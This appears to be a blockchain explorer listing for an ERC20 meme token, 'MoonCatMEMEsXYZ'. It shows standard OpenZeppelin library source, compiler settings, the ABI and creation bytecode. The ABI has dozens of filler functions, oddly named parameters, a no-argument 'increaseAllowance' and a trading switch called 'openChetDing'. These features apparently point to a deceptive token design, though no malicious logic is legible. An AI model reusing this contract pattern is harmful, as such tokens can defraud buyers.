Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol) pragma solidity ^0.8.0; import "./Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"msgg","type":"bool"}],"name":"LogMsgSender","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"myfriend","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"LessAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"myfriend","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"MoreAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_LuxFreePerson","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_cute","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFromReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"function0","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function1","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function10","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function100","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function11","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function12","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function13","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function14","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function15","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function16","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function17","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function18","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function19","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function2","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function20","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function21","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function22","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function23","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function24","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function25","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function26","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function27","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function28","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function29","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function3","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function30","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function31","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function32","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function33","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function34","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function35","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function36","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function37","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function38","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function39","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function4","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function40","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function41","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function42","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function43","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function44","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function45","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function46","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function47","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function48","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function49","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function5","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function50","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function51","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function52","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function53","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function54","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function55","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function56","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function57","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function58","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function59","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function6","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function60","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function61","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function62","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function63","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function64","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function65","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function66","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function67","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function68","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function69","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function7","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function70","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function71","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function72","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function73","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function74","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function75","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function76","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function77","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function78","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function79","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function8","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function80","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function81","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function82","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function83","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function84","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function85","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function86","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function87","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function88","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function89","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function9","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function90","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function91","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function92","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function93","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function94","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function95","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function96","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function97","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function98","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"function99","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"increaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromReward","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_tradingOpen","type":"bool"}],"name":"openChetDing","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rAmount","type":"uint256"}],"name":"tokenFromReflection","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"vinhxo","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a060405273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc260045f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f60055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506a084595161401484a0000005f196100c491906106bc565b5f196100d09190610719565b600c556040518060400160405280600f81526020017f4d6f6f6e4361744d454d457358595a0000000000000000000000000000000000815250600e9081610117919061097d565b506040518060400160405280600f81526020017f4d6f6f6e4361744d454d457358595a0000000000000000000000000000000000815250600f908161015c919061097d565b50601260105f6101000a81548160ff021916908360ff1602179055505f6011556011546012555f6013556013546014555f601560016101000a81548160ff0219169083151502179055503480156101b1575f80fd5b506101ce6101c361059760201b60201c565b61059e60201b60201c565b600c5460065f6101e261059760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e6a439053060045f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166040518363ffffffff1660e01b815260040161029c929190610a8b565b602060405180830381865afa1580156102b7573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906102db9190610ae0565b73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff1681525050600160095f61032161065f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160095f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505f33905060405180602001604052808273ffffffffffffffffffffffffffffffffffffffff1681525060015f820151815f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550905050604051806020016040528060016040518060200160405290815f82015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152505081525060025f820151815f015f820151815f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505090505061050661059760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6a084595161401484a00000060405161056d9190610b1a565b60405180910390a360405180602001604052805f81525060035f820151815f015590505050610b33565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f819050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6106c682610686565b91506106d183610686565b9250826106e1576106e061068f565b5b828206905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61072382610686565b915061072e83610686565b9250828203905081811115610746576107456106ec565b5b92915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806107c757607f821691505b6020821081036107da576107d9610783565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830261083c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610801565b6108468683610801565b95508019841693508086168417925050509392505050565b5f819050919050565b5f61088161087c61087784610686565b61085e565b610686565b9050919050565b5f819050919050565b61089a83610867565b6108ae6108a682610888565b84845461080d565b825550505050565b5f90565b6108c26108b6565b6108cd818484610891565b505050565b5b818110156108f0576108e55f826108ba565b6001810190506108d3565b5050565b601f82111561093557610906816107e0565b61090f846107f2565b8101602085101561091e578190505b61093261092a856107f2565b8301826108d2565b50505b505050565b5f82821c905092915050565b5f6109555f198460080261093a565b1980831691505092915050565b5f61096d8383610946565b9150826002028217905092915050565b6109868261074c565b67ffffffffffffffff81111561099f5761099e610756565b5b6109a982546107b0565b6109b48282856108f4565b5f60209050601f8311600181146109e5575f84156109d3578287015190505b6109dd8582610962565b865550610a44565b601f1984166109f3866107e0565b5f5b82811015610a1a578489015182556001820191506020850194506020810190506109f5565b86831015610a375784890151610a33601f891682610946565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610a7582610a4c565b9050919050565b610a8581610a6b565b82525050565b5f604082019050610a9e5f830185610a7c565b610aab6020830184610a7c565b9392505050565b5f80fd5b610abf81610a6b565b8114610ac9575f80fd5b50565b5f81519050610ada81610ab6565b92915050565b5f60208284031215610af557610af4610ab2565b5b5f610b0284828501610acc565b91505092915050565b610b1481610686565b82525050565b5f602082019050610b2d5f830184610b0b565b92915050565b60805161580a610b4b5f395f61220e015261580a5ff3fe608060405260043610610765575f3560e01c806371e83819116103c6578063bbfa6579116101fc578063ee1117bb11610117578063f7fd2e92116100aa578063fe44b6f611610079578063fe44b6f614611bbe578063fed95e9114611be8578063fff9fb2a14611c12578063fffab52d14611c4e5761076c565b8063f7fd2e9214611b16578063fa9e19cd14611b40578063fbf1108814611b6a578063fca4781a14611b945761076c565b8063f2fde38b116100e6578063f2fde38b14611a70578063f47f7b1414611a98578063f4b4e1f314611ac2578063f7bfe0ce14611aec5761076c565b8063ee1117bb146119c8578063ef50286d146119f2578063ef80297c14611a1c578063f28e6c1e14611a465761076c565b8063db70aca41161018f578063df63d89e1161015e578063df63d89e14611922578063e803b78f1461194c578063ec6bde7714611976578063ed91f1d0146119b25761076c565b8063db70aca414611868578063dba2c53914611892578063dcdbf928146118bc578063dd62ed3e146118e65761076c565b8063ca00c9bd116101cb578063ca00c9bd146117c0578063cc770dfe146117ea578063cfa15b0914611814578063d8f905b21461183e5761076c565b8063bbfa657914611718578063bc882fd114611742578063c421f9811461176c578063c956ab5f146117965761076c565b8063940d402d116102ec578063ac8a88581161027f578063b28cf4ce1161024e578063b28cf4ce14611670578063b56b30111461169a578063b65a475c146116c4578063b86f3a2a146116ee5761076c565b8063ac8a8858146115c8578063af55d4cc146115f2578063b0ee94331461161c578063b20d3908146116465761076c565b8063a17e186e116102bb578063a17e186e1461150e578063a2cec75414611538578063a744d02f14611562578063a9059cbb1461158c5761076c565b8063940d402d1461146657806395d89b41146114905780639608cdda146114ba5780639b9fe9f3146114e45761076c565b80637d819ae11161036457806384bc225d1161033357806384bc225d146113ac57806388f82020146113d65780638d97492c146114125780638da5cb5b1461143c5761076c565b80637d819ae1146113045780637feeb4b01461132e578063804db4e61461135857806381652568146113825761076c565b806375e6be70116103a057806375e6be701461125c57806376fbb77314611286578063773b29d8146112b057806378728c73146112da5761076c565b806371e83819146111de57806372f550081461120857806374e8b1fe146112325761076c565b80632e0153141161059b578063553c50b9116104c15780636068c078116104545780636c401300116104235780636c401300146111385780636f39a7a41461116257806370a082311461118c578063715018a6146111c85761076c565b80636068c0781461109057806366ca4315146110ba5780636960e950146110e45780636b91fd2e1461110e5761076c565b80635d3442a5116104905780635d3442a514610fe85780635f042f84146110125780635ffb6d281461103c5780636043f582146110665761076c565b8063553c50b914610f40578063564f765914610f6a5780635745da0d14610f945780635c2f0f7814610fbe5761076c565b80633c5459d51161053957806349bd5a5e1161050857806349bd5a5e14610e885780634c70059e14610eb257806352390c0214610edc5780635342acb414610f045761076c565b80633c5459d514610de05780633dd6b59e14610e0a5780634226707b14610e34578063427913f214610e5e5761076c565b8063355fa40211610575578063355fa40214610d385780633956781b14610d625780633a24555a14610d8c5780633bb4fa0f14610db65761076c565b80632e01531414610cba578063313ce56714610ce457806334be6c4a14610d0e5761076c565b806322a47e621161068b57806329381a9e1161061e5780632bd77d45116105ed5780632bd77d4514610c005780632d3576f414610c2a5780632d83811914610c545780632dfdf3e414610c905761076c565b806329381a9e14610b5857806329a7196414610b825780632a64052b14610bac5780632b5d52b214610bd65761076c565b806323b872dd1161065a57806323b872dd14610a9e57806326ad88c614610ada5780632726fdf714610b0457806327561e5214610b2e5761076c565b806322a47e62146109f657806322d121ae14610a2057806322dac33214610a4a57806323724ae614610a745761076c565b80630ed663661161070357806313de20cc116106d257806313de20cc1461094e57806318160ddd146109785780631d3f5192146109a25780631df1bc77146109cc5761076c565b80630ed66366146108a857806310f5a302146108d257806313114a9d146108fa578063133993f6146109245761076c565b806306fdde031161073f57806306fdde03146107ee5780